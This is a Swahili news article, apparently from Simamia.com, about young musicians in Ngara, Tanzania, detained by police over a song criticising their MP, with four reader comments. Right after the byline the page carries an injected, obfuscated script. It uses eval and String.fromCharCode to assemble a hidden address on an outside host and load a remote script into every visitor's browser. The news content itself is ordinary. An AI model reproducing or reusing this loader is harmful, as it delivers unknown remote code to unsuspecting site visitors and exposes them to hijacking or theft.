Recent Comments

Wasanii Ngara wakamatwa na polisi kisa wimbo

By Baraka Bitariho Nov 12, 2021
<p>Mheshimiwa Usikate Simu</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Vijana angalau watatu wilani Ngara, Kagera wamejikuta wakilazwa ndani baada ya kuimba wimbo walioitwa: Usikate Simu Mheshimiwa. Vijana wanaojishughulisha na tasinia ya music wilayani Ngara walijikuta katika mikono ya polisi baada ya kile kinachosemekana wimbo wao haukumsifu Mheshimiwa Mbunge wa Ngara Ndaisaba Ruhoro. Kwa siku tatu, Simamia.com na simamiatv imejaribu kumfikia Mbunge mwenyewe ili kupata ufafanuzi wa lawama wananchi wa Ngara walizofikisha kwenye ofisi zetu ila jitihada za kupata Mhe Ndaisaba Ruhoro wala wasaidizi wake ziligongwa mwamba. Hadi hii stori inaandawaliwa, wasaidizi wa Mheshimiwa Ndaisaba wala Mbunge mwenyewe hawapokea simu zetu.

 

 

Wimbo huu hapa:

 

 

Katika ongea ongea na wana Ngara, Ndayisaba Ruhoro, alichaguliwa na wanangara wakiwa na imani ya kuleta maendeleo ikiwemo kuboresha sanaa ya music. Akiwa anawania ubunge, Ndaisaba aliahidi kushirikisha vijana katika kuleta maendeleo.

Simamia.com iliwasiliana na  wakazi wa Ngara katika kupata mawazo yao juu ya uongozi na utendaji kazi wa Mbunge wao. Aliyejitabushilisha kamba Katarina wilayani Ngara aliezea kuona hali ya Mbunge wa sasa kusahau aliyo ahidi kwenye kampeni. “Alionekana ni mwana Ngara, mtoto wa mkulima mwenzetu, kuliko wale waliotoka nje ya Ngara kugombea nafasi ya Ubunge” ila sasa wana Ngara wanajiuliza kama walikosea step ama lah, Katarina ameiambia Simamia.com. Ndaishimiwe wa Kabanga naye alichangia kuwa kwenye Kampeni tulifurahia kuona vijana wengi walijitokeza kuwania nafasi ya ubunge na tulifurahishwa ahadi zake [Mhe Ruhoro] kushirikisha vijana, ila leo inaonekana vijana wote Ngara hawana hamu ya ahadi ambazo bado hadi leo hazijatimizwa.

Simamia.com na Simamiatv inamkaribisha Mheshimiwa George Ruhoro katika ofisi zetu za Kabanga kutoa maelezo yake ili atoe wasi wasi vijana. Hii ni ofa kwa kiongozo wa jimbo la Ngara kufafanua yale yanayoongelewa jimboni Ngara na wana Ngara kwa ujumla.

Wimbo ambao unasemekana umeperekea vijana kujikuta wanalala ndani unapatikana kwa kugusa hii link:

Source: Facebook

 

 

 

12 thoughts on “Wasanii Ngara wakamatwa na polisi kisa wimbo”
  1. Tumekuwa na Wanasiasa wa Hovyo ambao wanaoamini katika kukandamiza Jamii. Mambo ya Hovyo. Vijana tuwe makini

  2. Si utendaji wa mbunge upo mezani. Tatizo ni kwa nini wasanii ambambo ni baadhi ya vijana alioahidi kunufaika na maendeleo aliyo ahidi. Leo wameswendekwa gerezani. Kwa kuwa Ruhoro ndio kiongozi wa Jimbo letu, ameombwa atarifu umma na wazazi wa hao vijana lililowakuta mpaka kulazwa ndani. Hawa ni wananchi waliomchagua mpaka akabahatika kuwa na nafasi ya Ubunge.

  3. Aaah! Mbona nyimbo iko poa sana tena ime balance kabisa,… Mimi naona wote wako nahofo ambayo itawasumbua sana.
    Kwa maana ya police na mbunge, kushinikiza kukamatwa kwa hao wasanii.

    Mara nyingi kiongozi unapokuwa na hofu ya hivyo, hupoteza muelekea, kukamatwa kwa hao wasanii itamgarimu sana…. Nashauri waachiwe haraka na nyimbo iruhisiwe kupigwa ??

  4. Usikate simu mheshimiwa. Ulituahidia kutuletea maendeleo. Radha ya hayq maendeleo uliyotuletea haitufai hapa Ngara. Bora na wewe ungeenda kulowelea huko Dar kama wengine. Tulidhani wewe ni mkulima mwenzetu, leo tunajuta.

Comments are closed.